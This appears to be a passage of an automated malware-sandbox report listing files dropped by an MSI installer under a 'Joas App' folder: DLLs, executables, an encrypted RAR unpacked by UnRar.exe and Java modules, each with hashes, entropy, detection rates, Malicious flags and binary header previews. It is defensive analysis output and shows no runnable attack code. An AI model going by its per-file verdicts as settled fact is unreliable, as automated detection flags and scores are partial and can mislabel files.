                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........&...Ge..Ge..Ge../e..Ge../a..Ge../...Ge../g..Ge.Rich.Ge.........................PE..d...x............." .........................................................@.......5....`.........................................0................0...................!..............T............................................................................rdata..............................@..@.rsrc........0......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-crt-environment-l1-1-0.dll

                                                          Download File
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):12232
                                                          Entropy (8bit):6.5874576656353145
                                                          Encrypted:false
                                                          SSDEEP:192:6KNMWYhW6WWFYg7VWQ4eWSA5lJSdqnajeMh3:6KNMWYhWKiKdlaW
                                                          MD5:5CCE7A5ED4C2EBAF9243B324F6618C0E
                                                          SHA1:FDB5954EE91583A5A4CBB0054FB8B3BF6235EED3
                                                          SHA-256:AA3E3E99964D7F9B89F288DBE30FF18CBC960EE5ADD533EC1B8326FE63787AA3
                                                          SHA-512:FC85A3BE23621145B8DC067290BD66416B6B1566001A799975BF99F0F526935E41A2C8861625E7CFB8539CA0621ED9F46343C04B6C41DB812F58412BE9C8A0DE
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........&...Ge..Ge..Ge../e..Ge../a..Ge../...Ge../g..Ge.Rich.Ge.........................PE..d...g P..........." .........................................................0............`.........................................0..."............ ...................!..............T............................................................................rdata..R...........................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-crt-filesystem-l1-1-0.dll

                                                          Download File
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):13768
                                                          Entropy (8bit):6.645869978118917
                                                          Encrypted:false
                                                          SSDEEP:192:CGnWlC0i5ClWYhWwWWFYg7VWQ4eWtOUtpwBqnajrmaaGN4P:9nWm5ClWYhWQ8qlQGN6
                                                          MD5:41FBBB054AF69F0141E8FC7480D7F122
                                                          SHA1:3613A572B462845D6478A92A94769885DA0843AF
                                                          SHA-256:974AF1F1A38C02869073B4E7EC4B2A47A6CE8339FA62C549DA6B20668DE6798C
                                                          SHA-512:97FB0A19227887D55905C2D622FBF5451921567F145BE7855F72909EB3027F48A57D8C4D76E98305121B1B0CC1F5F2667EF6109C59A83EA1B3E266934B2EB33C
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........&...Ge..Ge..Ge../e..Ge../a..Ge../...Ge../g..Ge.Rich.Ge.........................PE..d...r..x.........." .........................................................0.......(....`.........................................0................ ...................!..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\avcodec-60.dll

                                                          Download File
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                          Category:dropped
                                                          Size (bytes):37333152
                                                          Entropy (8bit):6.632921864082428
                                                          Encrypted:false
                                                          SSDEEP:393216:LzyCmQCOCLheXbl4MEf+Eidgrpj3xO6FLzq2KHplhrX5:L5WLheXbl4MEf+HgrpjVF6PD5
                                                          MD5:32F56F3E644C4AC8C258022C93E62765
                                                          SHA1:06DFF5904EBBF69551DFA9F92E6CC2FFA9679BA1
                                                          SHA-256:85AF2FB4836145098423E08218AC381110A6519CB559FF6FC7648BA310704315
                                                          SHA-512:CAE2B9E40FF71DDAF76A346C20028867439B5726A16AE1AD5E38E804253DFCF6ED0741095A619D0999728D953F2C375329E86B8DE4A0FCE55A8CDC13946D5AD8
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d........(........&"...&............P........................................P.......3:...`... ......................................`...........A.....p.......t...X.9.H'.......M..............................(......................P............................text...............................`..`.rodata.0........................... ..`.data...............................@....rdata....X......X.................@..@.pdata..t...........................@..@.xdata..`...........................@..@.bss...................................edata.......`.......|..............@..@.idata...A.......B..................@....CRT....`..........................@....tls...............................@....rsrc...p..........................@....reloc...M.......N..................@..B........................................................................................

                                                          C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\avformat-60.dll

                                                          Download File
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                          Category:dropped
                                                          Size (bytes):5100112
                                                          Entropy (8bit):6.374242928276845
                                                          Encrypted:false
                                                          SSDEEP:49152:WBUp8DPNkkup6GAx9HEekwEfG/66xcPiw+UgAnBM+sVf9d3PWKOyz/Omlc69kXOV:WB/Z16w8idUgfT0b6LnBSpytGyodUl
                                                          MD5:01589E66D46ABCD9ACB739DA4B542CE4
                                                          SHA1:6BF1BD142DF68FA39EF26E2CAE82450FED03ECB6
                                                          SHA-256:9BB4A5F453DA85ACD26C35969C049592A71A7EF3060BFA4EB698361F2EDB37A3
                                                          SHA-512:0527AF5C1E7A5017E223B3CC0343ED5D42EC236D53ECA30D6DECCEB2945AF0C1FBF8C7CE367E87BC10FCD54A77F5801A0D4112F783C3B7E829B2F40897AF8379
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 3%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.........D..,....&"...&.R4...D.....P.........................................E.....r}N...`... .......................................D.0-....D.hX...PE.......?.......M.H'...`E..e............................>.(.....................D.`............................text....P4......R4.................`..`.data....3...p4..4...V4.............@....rdata...&....4..(....4.............@..@.pdata........?.......?.............@..@.xdata..8{....A..|...TA.............@..@.bss..........D..........................edata..0-....D.......C.............@..@.idata..hX....D..Z....C.............@....CRT....`....0E......XD.............@....tls.........@E......ZD.............@....rsrc........PE......\D.............@....reloc...e...`E..f...`D.............@..B................................................................................................................................

                                                          C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\avutil-58.dll

                                                          Download File
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                          Category:dropped
                                                          Size (bytes):1089600
                                                          Entropy (8bit):6.535744457220272
                                                          Encrypted:false
                                                          SSDEEP:24576:NFUq9wHzADwiB0Bm3k6gz0sA+wLDZyoFNRsKYw:TUdMDwIgm3kpzsNpyoFDsKYw
                                                          MD5:3AAF57892F2D66F4A4F0575C6194F0F8
                                                          SHA1:D65C9143603940EDE756D7363AB6750F6B45AB4E
                                                          SHA-256:9E0D0A05B798DA5D6C38D858CE1AD855C6D68BA2F9822FA3DA16E148E97F9926
                                                          SHA-512:A5F595D9C48B8D5191149D59896694C6DD0E9E1AF782366162D7E3C90C75B2914F6E7AFF384F4B59CA7C5A1ECCCDBF5758E90A6A2B14A8625858A599DCCA429B
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d........f..X.....&"...&.2...b......P......................................... ......?....`... ......................................0 .xC.... ....... .h.......@>...x..H'.... ............................. Z..(..................... .P............................text....1.......2..................`..`.data........P.......6..............@....rdata...,...`.......8..............@..@.pdata..@>.......@...f..............@..@.xdata...K.......L..................@..@.bss......... ...........................edata..xC...0 ..D..................@..@.idata........ ......6..............@....CRT....`..... ......N..............@....tls.......... ......P..............@....rsrc...h..... ......R..............@....reloc........ ......V..............@..B................................................................................................................................

                                                          C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\createdump.exe

                                                          Download File
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:PE32+ executable (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):57488
                                                          Entropy (8bit):6.382541157520703
                                                          Encrypted:false
                                                          SSDEEP:768:eQ6XULhGj8TzwsoeZwVAsuEIBh8v6H3eQdFyN+yghK3m5rR8vSoQuSd:ECVbTGkiE/c+XA3g2L7S
                                                          MD5:71F796B486C7FAF25B9B16233A7CE0CD
                                                          SHA1:21FFC41E62CD5F2EFCC94BAF71BD2659B76D28D3
                                                          SHA-256:B2ACB555E6D5C6933A53E74581FD68D523A60BCD6BD53E4A12D9401579284FFD
                                                          SHA-512:A82EA6FC7E7096C10763F2D821081F1B1AFFA391684B8B47B5071640C8A4772F555B953445664C89A7DFDB528C5D91A9ADDB5D73F4F5E7509C6D58697ED68432
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l............uU.....x.....x.....x....{...........ox....ox9....ox....Rich...........................PE..d......d.........."......f...N......p).........@....................................2.....`.....................................................................P........(......d.......T...............................8............................................text....e.......f.................. ..`.rdata...6.......8...j..............@..@.data...............................@....pdata..P...........................@..@_RDATA..............................@..@.rsrc...............................@..@.reloc..d...........................@..B................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\iwhgjds.rar

                                                          Download File
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:RAR archive data, v5
                                                          Category:dropped
                                                          Size (bytes):424910
                                                          Entropy (8bit):7.999568605221469
                                                          Encrypted:true
                                                          SSDEEP:6144:bGg8t2FsdvHWyFx0nOtEIUS2YrXJyEXY+Y223Rb4ETaGaKvzLUjYScApA:jV2VxFtdrXfXY+Y22WETa3KvnYXcAq
                                                          MD5:07B1777CB885122FFB9A6300C58D660B
                                                          SHA1:A85B0F8F155906DC1DE4381CC9D22F28A6BEAC6D
                                                          SHA-256:7BC4F8C4111DC16005DBCA3FE3A352AE09C6DE34C5ACC689109CB45D9E4CA653
                                                          SHA-512:3376D929DA5CC4DEF6A86346DBBA0B67DCC853BA5C064E3A56D490909DB913C7E5F1C2775E64751F942FAC4681802E8990E3767919D2C6843044066E0FCFB98D
                                                          Malicious:false
                                                          Preview:Rar!....1!].!.....}.Z [.%49...........6.......'&..hN.....2.+....c..y.n..$.z.#.....$...U.t...p...n.`K.....r..........u..kE$....z ..;.D\....$L..!..W...[.d....$.B....n.d.DE"4..G:.......x..\...}.$80.;...\..>..=....4V...MfE..@v..c.W...,..C!&.B.gw...i.8......Q...d.kQbZ......p...@^....`.6pM|..IU.i..j..].Ri..............J.g.T........u....j...bq.....:4.........8*R...%.F......i...W..w.]g.....".!..2.4..#....1y.8.s=^..<.....&.h.....od4z.N..5v...q...j...^...O....0..K.3W..0;.n?J...TO_.U...;....U.bC.y..H..3....u-...uS....K..bg3%=.lTw...0...........=W...n....n..GO....;.[z....F.....;.....J%...Q.O.....xL....a..5....R.|Q.....j&..X.N...dd...z..3..1.`!C`..[..eG...H:......?U.5..-(A.u..F7=..w.L.\q|..CY...<?AJ'.-9Nm.=:r7r.3...k..:.+..{..'..E.<.6/u......a.x.LE..._....'....@.R..N/)M..B...+X!......2.&....s.d.oH$..v&..G.H...T...T2....g....$..|^...1.....g......s....j.I.(..N......n.W'.l...a.n%..nb..k....&.xm..}|.,.b.d(..4`hk.A/.5.....No$T.C..S.f.o.h.2.WN...

                                                          C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\msvcp140.dll

                                                          Download File
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):566704
                                                          Entropy (8bit):6.494428734965787
                                                          Encrypted:false
                                                          SSDEEP:12288:M/Wn7JnU0QUgqtLe1fqSKnqEXG6IOaaal7wC/QaDWxncycIW6zuyLQEKZm+jWodj:yN59IW6zuAQEKZm+jWodEEY1u
                                                          MD5:6DA7F4530EDB350CF9D967D969CCECF8
                                                          SHA1:3E2681EA91F60A7A9EF2407399D13C1CA6AA71E9
                                                          SHA-256:9FEE6F36547D6F6EA7CA0338655555DBA6BB0F798BC60334D29B94D1547DA4DA
                                                          SHA-512:1F77F900215A4966F7F4E5D23B4AAAD203136CB8561F4E36F03F13659FE1FF4B81CAA75FEF557C890E108F28F0484AD2BAA825559114C0DAA588CF1DE6C1AFAB
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Y...................Z.........O.....O.....O.....O.....O.....O.6....O.....Rich...........................PE..d...%|.a.........." .....<...\.......)...................................................`A.........................................5..h...(...,............p...9...~...'......0.......T...............................8............P...............................text....;.......<.................. ..`.rdata..j....P.......@..............@..@.data...`:...0......................@....pdata...9...p...:...6..............@..@.rsrc................p..............@..@.reloc..0............t..............@..B................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exe

                                                          Download File
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:PE32+ executable (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):35656
                                                          Entropy (8bit):6.370522595411868
                                                          Encrypted:false
                                                          SSDEEP:768:ixmeWkfdHAWcgj7Y7rEabyLcRwEpYinAMx1nyqaJ:pXUdg8jU7r4LcRZ7Hx1nyqa
                                                          MD5:D3CAC4D7B35BACAE314F48C374452D71
                                                          SHA1:95D2980786BC36FEC50733B9843FDE9EAB081918
                                                          SHA-256:4233600651FB45B9E50D2EC8B98B9A76F268893B789A425B4159675B74F802AA
                                                          SHA-512:21C8D73CC001EF566C1F3C7924324E553A6DCA68764ECB11C115846CA54E74BD1DFED12A65AF28D9B00DDABA04F987088AA30E91B96E050E4FC1A256FFF20880
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........D..D..D..M.3.J......F......W......N......G......F..D..l......A..D.........E...._.E......E..RichD..................PE..d................"....#.2...4......`7.........@..........................................`..................................................b..,....................d..H'......<....Z..p...........................`Y..@............P...............................text....1.......2.................. ..`.rdata..H"...P...$...6..............@..@.data...H............Z..............@....pdata...............\..............@..@.rsrc................`..............@..@.reloc..<............b..............@..B........................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs.dll

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):1471488
                                                          Entropy (8bit):6.531060177613409
                                                          Encrypted:false
                                                          SSDEEP:12288:UZ0/8PSUgSokxJoArHkF6JidEn+95uTfO7ATuze7IbOjtPPb:4O8PSUgS/xKeEFYw+QAaS7ISjR
                                                          MD5:E61C28A8F899A43145083F0DE80E099C
                                                          SHA1:D976FA364385FDAF4CB38D2F9E2003E93983A521
                                                          SHA-256:ED2589F02D22A35500A93D970D872CCF1D83EC4446F591B4E6B8F4D46EBCDF22
                                                          SHA-512:F5B6086B395DA196761D6EF8501725905C40DADD11F8096970EA3B9750F00961A36215C88F5C19E96C47BA719C0395A5BF6B1D92D56702473CA978EF6F07D596
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 24%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......g.........." ...).@...j......4.....................................................`.........................................p.......H...d................................... -......................./..(....+..@............P...............................text....>.......@.................. ..`.rdata..X....P.......D..............@..@.data...l........z..................@....pdata...............J..............@..@.reloc...............d..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\swresample-4.dll

                                                          Download File
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                          Category:dropped
                                                          Size (bytes):158968
                                                          Entropy (8bit):6.4238235663554955
                                                          Encrypted:false
                                                          SSDEEP:1536:izN/1rbQ+rTccg/Lla75jjVBzYCDNzuDQr5whduOd7EKPuh9Aco6uAGUtQFUzcnX:8N/FQ+rejlaFhdrXORhjD6VGUtQWk
                                                          MD5:7FB892E2AC9FF6981B6411FF1F932556
                                                          SHA1:861B6A1E59D4CD0816F4FEC6FD4E31FDE8536C81
                                                          SHA-256:A45A29AECB118FC1A27ECA103EAD50EDD5343F85365D1E27211FE3903643C623
                                                          SHA-512:986672FBB14F3D61FFF0924801AAB3E9D6854BB3141B95EE708BF5B80F8552D5E0D57182226BABA0AE8995A6A6F613864AB0E5F26C4DCE4EB88AB82B060BDAC5
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...........O.....&"...&.h..........P.....................................................`... ...................................... .......0..T....`..........X....E..H'...p..................................(...................02...............................text....f.......h..................`..`.data................l..............@....rdata...Q.......R...n..............@..@.pdata..X...........................@..@.xdata..............................@..@.bss.....................................edata....... ......................@..@.idata..T....0......................@....CRT....X....@......................@....tls.........P......................@....rsrc........`......................@....reloc.......p......................@..B................................................................................................................................

                                                          C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\swscale-7.dll

                                                          Download File
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                          Category:dropped
                                                          Size (bytes):707200
                                                          Entropy (8bit):6.610520126248797
                                                          Encrypted:false
                                                          SSDEEP:12288:hTl8xt5jEuhuoWZz8Rt5brZcXVEZMbYwepVQ0G6ddTD8qevJMLf50555555555mj:hZ8xt5jEuhuoWZz8Rt5brZcXVEZMbYJz
                                                          MD5:1144E36E0F8F739DB55A7CF9D4E21E1B
                                                          SHA1:9FA49645C0E3BAE0EDD44726138D7C72EECE06DD
                                                          SHA-256:65F8E4D76067C11F183C0E1670972D81E878E6208E501475DE514BC4ED8638FD
                                                          SHA-512:A82290D95247A67C4D06E5B120415318A0524D00B9149DDDD8B32E21BBD0EE4D86BB397778C4F137BF60DDD4167EE2E9C6490B3018031053E9FE3C0D0B3250E7
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...........-.....&"...&............P.....................................................`... ......................................P.......`..........x....P......8...H'......................................(....................c..`............................text...(...........................`..`.data...............................@....rdata...s.......t..................@..@.pdata.......P...0...&..............@..@.xdata...9.......:...V..............@..@.bss.....................................edata.......P......................@..@.idata.......`......................@....CRT....`....p......................@....tls................................@....rsrc...x...........................@....reloc..............................@..B................................................................................................................................

                                                          C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\una_front\classes.jsa

                                                          Download File
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):12124160
                                                          Entropy (8bit):4.1175508751036585
                                                          Encrypted:false
                                                          SSDEEP:49152:opbNLHjtBKapOZoWPQ8MQvfyf3t+WpskQS+ZSZmpPwoe5GOSwleJiXACPQDk8p8j:o9NDU1eB1
                                                          MD5:8A13CBE402E0BBF3DA56315F0EBA7F8E
                                                          SHA1:EE8B33FA87D7FA04B9B7766BCF2E2C39C4F641EA
                                                          SHA-256:7B5E6A18A805D030779757B5B9C62721200AD899710FF930FC1C72259383278C
                                                          SHA-512:46B804321AB1642427572DD141761E559924AF5D015F3F1DD97795FB74B6795408DEAD5EA822D2EB8FBD88E747ECCAD9C3EE8F9884DFDB73E87FAD7B541391DA
                                                          Malicious:false
                                                          Preview:.................*.\.....................................+................................Ol.....................................">.............................d..3......................A.......@...... t.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................(#......(............... ................Java HotSpot(TM) 64-Bit Server VM (15.0.1+9-18) for windows-amd64 JRE (15.0.1+9-18), built on Sep 15 2020 14:43:54 by "mach5one" with unknown MS VC++:1925....................................................................................................................................................

                                                          C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\una_front\java.datatransfer.jmod

                                                          Download File
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:Java jmod module version 1.0
                                                          Category:dropped
                                                          Size (bytes):51389
                                                          Entropy (8bit):7.916683616123071
                                                          Encrypted:false
                                                          SSDEEP:768:GO5DN7hkJDEnwQm0aCDOdC4Lk1eo8eNEyu/73vVjPx5S+3TYWFwSvZt6xdWDvw:GO5h7hkREnyvo8QBuDNjfvD1/3vw
                                                          MD5:8F4C0388762CD566EAE3261FF8E55D14
                                                          SHA1:B6C5AA0BBFDDE8058ABFD06637F7BEE055C79F4C
                                                          SHA-256:AAEFACDD81ADEEC7DBF9C627663306EF6B8CDCDF8B66E0F46590CAA95CE09650
                                                          SHA-512:1EF4D8A9D5457AF99171B0D70A330B702E275DCC842504579E24FC98CC0B276F8F3432782E212589FC52AA93BBBC00A236FE927BE0D832DD083E8F5EBDEB67C2
                                                          Malicious:false
                                                          Preview:JM..PK.........n/Q................classes/module-info.classeP.N.0..../.$...pAM.D.p..!!..X...m.d'.....P7...biw..Y.?._...pM.m..X.q..2.D8o...o.0.J.s...,...".'..>..F..r..M..G.L......!.je.BG....:v.;..a@...Y...3..?.Y....\.m.).CBwn......'.N..+G+^*#.j...R.A..qV.1o...p.....|._.-N$.!.;X....|....G......qi.W{PK...^0.........PK.........n/Q............-...classes/java/awt/datatransfer/Clipboard.class.X.w.W....c...-.Ii...#.P..........@(`.......3.....R...........<....h..W.z......=.=~....l..DN..............;y.@7..#....2.P.._.WR.b.Km..f......9w1T...A.....d..b.r.Ie.Gq,..U+.kcC.be.*.eTe......K3.usU.2...Pe.4T.aYz....>!..q..3.dL.Q..fh/#..P.t.;.f,.."..7..v.(..K7}.2nZ;.Mg..OuzU..c.....!wR.xz....7...tG..d.ED..3...fs.{n\...x...r.!.#X.6.Ke.v........1n.P......#..P...J....)^.dt....k...k...F5...e$.d...=~Do.*t.2....KX....B.#Ha..U2n.j...+fh&....&.zk,.....>...aQ......kj...:.h.Q.uTv.B ......N....*..r'..x..D.4.`k 76fZ....fG..#.....7.4.:w..6....#...x..>lfh.B'.....'l..V.....5..H..

                                                          C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\una_front\java.instrument.jmod

                                                          Download File
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:Java jmod module version 1.0
                                                          Category:dropped
                                                          Size (bytes):41127
                                                          Entropy (8bit):7.961466748192397
                                                          Encrypted:false
                                                          SSDEEP:768:L0xH2Z5C7/c8GqFsHWShYYptTpmPSB4gTQSq4Yz1jHoAsbjX:wxH66/crqiH3tTVTsSVYz1jIAsfX
                                                          MD5:D039093C051B1D555C8F9B245B3D7FA0
                                                          SHA1:C81B0DAEDAB28354DEA0634B9AE9E10EE72C4313
                                                          SHA-256:4A495FC5D119724F7D40699BB5D2B298B0B87199D09129AEC88BBBDBC279A68D
                                                          SHA-512:334FD85ACE22C90F8D4F82886EEF1E6583184369A031DCEE6E0B6624291F231D406A2CEC86397C1B94D535B36A5CF7CB632BB9149B8518B794CBFA1D18A2478F
                                                          Malicious:false
                                                          Preview:JM..PK.........n/Q................classes/module-info.classU.M..0..../..........LL...*A.$.t.\x..e,U.N.N..7o.....=B+..,.@..:.`.....`....L.,.".B.M......:...._..uBGf.5.M..g..."..8K\..B.".z..|=6.=1.KB..v,.yJ0/......[.r..OU`....Q}...kP.94oh...b..K{...].'PK........#...PK.........n/Q............2...classes/java/lang/instrument/ClassDefinition.class.SMo.@.}.8q.4M.@.h..b;... ..d.RP$.c...#g...#@.....@.G..........7o.......@.-..J.T.eT..'.......tt.=.P9.C_t.J.5... ...Y...z|*.(..TE...e.....(.......v?pg....<...I.1.:....H.U...1.)..p...P.......|...04..Q..2...%..8~.......#..p"...n..<.Uq..=..:.c..1.2...x.o.w..#....^?q.I..:..Y...6...N..c..>2.k.U...L..&V.H...%....y...[.~GJ...B/M......%...t....+.I.E....H..}....m..j_..8C...:.n...(*..z..Z.Q...$....a.}..T.xW.$....52...T.o..mSL_~.L.FM....W.z.I.]....)..e.....A..$..xH...Td...0i..."...0X....PK..X..~........PK.........n/Q............7...classes/java/lang/instrument/ClassFileTransformer.class.S.n.@.=.8.M.n..b^-/..G..

                                                          C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\una_front\java.logging.jmod

                                                          Download File
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:Java jmod module version 1.0
                                                          Category:dropped
                                                          Size (bytes):113725
                                                          Entropy (8bit):7.928841651831531
                                                          Encrypted:false
                                                          SSDEEP:3072:6jB5A+VPT8IdtpHAUfEzhLpIrxbt2rlnH6:6ZRTPHgU2pItshH6
                                                          MD5:3A03EF8F05A2D0472AE865D9457DAB32
                                                          SHA1:7204170A08115A16A50D5A06C3DE7B0ADB6113B1
                                                          SHA-256:584D15427F5B0AC0CE4BE4CAA2B3FC25030A0CF292F890C6D3F35836BC97FA6D
                                                          SHA-512:1702C6231DAAB27700160B271C3D6171387F89DA0A97A3725B4B9D404C94713CB09BA175DE8E78A8F0CBD8DD0DD73836A38C59CE8D1BD38B4F57771CF9536E77
                                                          Malicious:false
                                                          Preview:JM..PK.........n/Q................classes/module-info.classuQ.N.1.=W......n\1.D.5$&....T...2%....\..~..3(......9.6...o....%..:L...x.=..p..L.......".Gm......*..Z9.R+...}x..$.Y,,..-..z..{.v.K..:9m[.dl....Q#t..F$:5c..h.*.^x".8 \N..A!....O....@.0.Z....p]......0_(.mB...=.J..<.k"4....g<......M$,....:Kz|..^.........8q..{...}.*G....p.S.W...l.M.....PK..R...).......PK.........n/Q................classes/java/util/logging/ConsoleHandler.class}S[o.A...KW..jk.....jy...K.b.R.mH|.......2.K....h...G..,..K...s..r......7....d.u....C...y3..j*..2...1..!wx..2T:.T...b.^..`.D[...0....n.cXy#C..e...=.E.....]..%L..<x.....W........z..u.s..a.e..Zq..-.E@n.!..)....F...\.E...<...[.;W..t.i%.mT".w.x..(.m,...r.....tZ..vPepFI_...D..b..0.U...S;....XP.@..C.#Cq..}aNy_..ZG...q#m<;..g2b.]"..Y.....[7."+..#"wOtb..-..."..@..(.>Y0......C.h...?.~..8A.Mp.....N....Z$ .E...."o.E.uz3;..m.P.z.....7...?.'.q>...2mN.gLv...q1..[}..@~..M.....K..sS.....PK....0w........PK.........n/Q............,...classes/ja

                                                          C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\una_front\java.management.jmod

                                                          Download File
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:Java jmod module version 1.0
                                                          Category:dropped
                                                          Size (bytes):896846
                                                          Entropy (8bit):7.923431656723031
                                                          Encrypted:false
                                                          SSDEEP:12288:3xz+ej0yUGnip25kAyyrAm0G4hcpbLIWFWb4YNlgWUz4u5cnLXlAVz/Q+9Ec8zCU:3cZpcryy8mp4hpSxWUQuV//yDXX
                                                          MD5:C6FBB7D49CAA027010C2A817D80CA77C
                                                          SHA1:4191E275E1154271ABF1E54E85A4FF94F59E7223
                                                          SHA-256:1C8D9EFAEB087AA474AD8416C3C2E0E415B311D43BCCA3B67CBF729065065F09
                                                          SHA-512:FDDC31FA97AF16470EA2F93E3EF206FFB217E4ED8A5C379D69C512652987E345CB977DB84EDA233B190181C6E6E65C173062A93DB3E6BB9EE7E71472C9BBFE34
                                                          Malicious:false
                                                          Preview:JM..PK.........n/Q................classes/module-info.class.S.N.A.=-.............^PQP4F..|..]{.........S|...(cu/..i.d.z...[....'.M|`.M.GrI.).1.4...8...V.b.EE.Rg...zV.K......Os.W.S?.e.GY.Q`.od..d..Zf....2>.B.29.D.3L7...M&....8.;..2...}..n..n.g...S. ?..._V..Q..9mBo0L..~dD.t.c.ric..2r5qLvr..V....Sm..I}.}.a..Od$2e..M.v.m..w....L..s.C.;...#.f..Ln.......5..9.2....5......P......M.$V.|;...'mw.Vl.2....D..1%.l.a..o...O....!.......h...9V.L.x..?..n]/.6......iVe..{.4.K..s.[....y..|2....3,`.a.....H69.a.;09.5K.C....a_.G.`Jm...ER......9I.D.n...Wp........%..WI...tf..pg5..SN.8y..Y'.:9....U.pq.....}.]X..aE....^t..x.l...^....m.#.......a."r.l.2..Lf).y.^.h..u....PK....N.i.......PK.........n/Q............0...classes/com/sun/jmx/defaults/JmxProperties.class.UMS#U.=.aH.4.4.....J2...h..6v.L2q.......tS.)F........\.....Y..h2...*...{.......w..8Ha.....p.C.c..C;..^+S...F.0..xNt....J5.$.b.og..9l.g....Q..k......"..I....b....-..^.n..<x..4.$pY.(..,\~.F..0...Z<`X[...(p...u^.

                                                          C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\utest.dll

                                                          Download File
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):639224
                                                          Entropy (8bit):6.219852228773659
                                                          Encrypted:false
